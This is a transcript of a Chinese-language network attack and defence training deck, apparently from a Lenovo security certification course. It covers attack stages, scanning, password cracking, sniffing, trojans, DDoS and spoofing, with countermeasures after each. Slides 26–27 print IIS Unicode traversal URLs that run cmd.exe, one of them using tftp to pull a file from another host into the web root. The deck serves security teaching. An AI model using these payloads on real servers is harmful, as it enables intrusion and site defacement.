1 / 69

联想信息安全 LSPE 认证培训

联想信息安全 LSPE 认证培训. 网络攻击与防范培训教材. 典型的攻击步骤. 预攻击探测. 收集信息,如 OS 类型,提供的服务端口. 发现漏洞,采取攻击行为. 破解口令文件,或利用缓存溢出漏洞. 获得攻击目标的控制权系统. 获得系统帐号权限,并提升为 root 权限. 安装系统后门. 方便以后使用. 继续渗透网络,直至获取机密数据. 以此主机为跳板,寻找其它主机的漏洞. 消灭踪迹. 消除所有入侵脚印,以免被管理员发觉. 预攻击探测. Ping sweep 寻找存活主机 Port scan 寻找存活主机的开放服务(端口)

loman
Download Presentation

联想信息安全 LSPE 认证培训

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. 联想信息安全LSPE 认证培训 网络攻击与防范培训教材

  2. 典型的攻击步骤 预攻击探测 收集信息,如OS类型,提供的服务端口 发现漏洞,采取攻击行为 破解口令文件,或利用缓存溢出漏洞 获得攻击目标的控制权系统 获得系统帐号权限,并提升为root权限 安装系统后门 方便以后使用 继续渗透网络,直至获取机密数据 以此主机为跳板,寻找其它主机的漏洞 消灭踪迹 消除所有入侵脚印,以免被管理员发觉 2

  3. 预攻击探测 • Ping sweep • 寻找存活主机 • Port scan • 寻找存活主机的开放服务(端口) • OS fingerprint • 操作系统识别 3

  4. 端口扫描 4

  5. 针对预攻击探测的防范措施 • Ping sweep • 安装防火墙,禁止ICMP ping,使用NAT隐 藏内部网络结构 • Port scan • 安装防火墙,禁止访问不该访问的服务端口 • OS fingerprint • 安装防火墙,只允许访问少量服务端口,由 于攻击者缺乏必要的信息,无法判断OS类型 5

  6. 漏洞扫描 6

  7. 攻击手法 vs. 入侵者技术 攻击手法与工具 半开隐蔽扫描 高 IP欺骗 拒绝服务 DDOS 攻击 嗅探 www 攻击 消除痕迹 自动探测扫描 GUI远程控制 后门 检测网络管理 破坏审计系统 会话劫持 控制台入侵 利用已知的漏洞 入侵者技术 低 破解密码 可自动复制的代码 密码猜测 1980 1985 1990 1995 2000 7

  8. 漏洞利用周期图表 入侵者采用公 布的攻击代码 自动扫描安全 漏洞工具发布 简陋的漏洞 攻击代码发布 自动扫描安全漏 洞工具广泛流传 入侵者着眼 新的漏洞 资深黑客 发现漏洞 8

  9. 针对漏洞扫描的防范措施 • 安装防火墙,禁止访问不该访问的服务端口,使用NAT隐藏内部网络结构 • 安装入侵检测系统,检测漏洞扫描行为 • 安装安全评估系统,先于入侵者进行漏洞扫描,以便及早发现问题并解决 • 提高安全意识,经常给操作系统和应用软件打补丁 9

  10. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 10

  11. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 11

  12. 暴力穷举 • 完全取决于机器的运算速度 • 字典破解 • 大大减少运算的次数,提高成功率 12

  13. 13

  14. 针对口令破解攻击的防范措施 • 安装入侵检测系统,检测口令破解行为 • 安装安全评估系统,先于入侵者进行模拟口令破解,以便及早发现弱口令并解决 • 提高安全意识,避免弱口令 14

  15. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 15

  16. 网络嗅探是主机的一种工作模式,在这种模式下,主机可以接收到共享式网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些网络监听工具,例如NetXray,tcpdump ,Dsniff等就可以轻而易举地截取包括口令、帐号等敏感信息。 16

  17. 网上截获的 帐号和口令 17

  18. 网上截获的 帐号和口令 18

  19. 针对网络嗅探攻击的防范措施 • 安装VPN网关,防止对网间网信道进行嗅探 • 对内部网络通信采取加密处理 • 采用交换设备进行网络分段 • 采取技术手段发现处于混杂模式的主机,发掘“鼹鼠” 19

  20. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 20

  21. 特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会在计算机系统中隐藏一个可以在启动时悄悄执行的程序。这种远程控制工具可以完全控制受害主机,危害极大。 Windows下: Netbus、subseven、BO、冰河、网络神偷等 UNIX下: Rhost ++、Login后门、rootkit等 21

  22. 22

  23. 针对木马攻击的防范措施 • 安装防火墙,禁止访问不该访问的服务端口,使用NAT隐藏内部网络结构 • 安装防病毒软件 • 提高安全意识,尽量避免使用来历不明的软件 23

  24. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 24

  25. 25

  26. http://10.1.5.10/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dirhttp://10.1.5.10/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 26

  27. http://10.1.5.10/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp+10.1.5.81+get+index.html+g:\inetpub\wwwroot\guanli\index.htmhttp://10.1.5.10/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp+10.1.5.81+get+index.html+g:\inetpub\wwwroot\guanli\index.htm 27

  28. 28

  29. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 29

  30. IGMP-NUKE攻击 30

  31. 针对拒绝服务攻击的防范措施 • 安装防火墙,禁止访问不该访问的服务端口,过滤不正常的畸形数据包,使用NAT隐藏内部网络结构 • 安装入侵检测系统,检测拒绝服务攻击行为 • 安装安全评估系统,先于入侵者进行模拟攻击,以便及早发现问题并解决 • 提高安全意识,经常给操作系统和应用软件打补丁 31

  32. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 32

  33. 分布式拒绝服务攻击(DDoS) • DDoS攻击由三部分组成 • 客户端程序(黑客主机) • 控制点(Master) • 代理程序(Zombie),或者称为攻击点(daemon) 33

  34. Hacker 黑客扫描 Internet 寻找安全性差的计 算机 1 未受保护的计算机 Internet 扫描程序 DDoS攻击的第一步 34

  35. Hacker Internet DDoS攻击的第二步 Zombies 黑客秘密地安装zombie 代理程序, 将那些未受保护的计算机变成攻击点,这些沦为黑客帮凶的计算机称为zombies 2 35

  36. Hacker Master Server Internet DDoS攻击的第三步 Zombies 黑客选择一台 Master Server 用来发送命令给 zombies 3 36

  37. Hacker Master Server Internet 目标系统 DDoS攻击的第四步 Zombies 黑客使用客户端程序给 Master Server 发送进 攻命令 4 37

  38. Hacker Master Server Internet 目标系统 DDoS攻击的第五步 Zombies Master Server向zombies 发送信号, 让这些受控的攻击点zombies一起向目标系统发起攻击 5 38

  39. Hacker Master Server Internet 目标系统 DDoS攻击的第六步 Zombies 目标系统被大量的 假请求淹没 ,被迫关闭 6 用户 请求被拒绝 39

  40. Yahoo受攻击过程 攻击者 Master Master Master Master Master Master Flooding Flooding Flooding Flooding Flooding Flooding 攻击目标 40

  41. 针对DDoS攻击的防范措施 • 安装防火墙,禁止访问不该访问的服务端口,过滤不正常的畸形数据包,使用NAT隐藏内部网络结构 • 安装入侵检测系统,检测DDoS攻击通信 • 提高安全意识,经常给操作系统和应用软件打补丁 41

  42. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 42

  43. A B Hacker 当A与B需要通讯时:A发送ARP Request询问B的MAC地址 B发送ARP Reply告诉A自己的MAC地址 43

  44. Meet-in-Middle: Hacker发送伪装的ARP Reply告诉A,计算机B的MAC地址是Hacker计算机的MAC地址。 Hacker发送伪装的ARP Reply告诉B,计算机A的MAC地址是Hacker计算机的MAC地址。 这样A与B之间的通讯都将先经过Hacker,然后由Hacker进行转发。于是Hacker可以捕获到所有A与B之间的数据传输(如用户名和密码)。 这是一种典型的中间人攻击方法。 44

  45. 针对ARP欺骗攻击的防范措施 • 安装入侵检测系统,检测ARP欺骗攻击 • MAC地址与IP地址绑定 45

  46. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 46

  47. DoS攻击 SYN|ACK 探测ISN规律 SYN (我是B,可以连接吗?) ACK (我是B,确认连接) B 互相信任 A Z 47

  48. 针对IP欺骗攻击的防范措施 • 安装VPN网关,实现加密和身份认证 • 实施PKI CA,实现身份认证 • 通信加密 48

  49. 一、基于口令的攻击 二、网络嗅探攻击 三、木马与后门攻击 四、利用漏洞攻击 五、拒绝服务攻击 六、分布式拒绝服务攻击 七、ARP欺骗攻击 八、IP欺骗攻击 九、病毒蠕虫攻击 十、社交工程攻击 49

  50. 针对病毒蠕虫攻击的防范措施 • 安装防火墙,禁止访问不该访问的服务端口 • 安装入侵检测系统,检测病毒蠕虫攻击 • 安装防病毒软件,阻挡病毒蠕虫的侵袭 • 提高安全意识,经常给操作系统和应用软件打补丁 50

More Related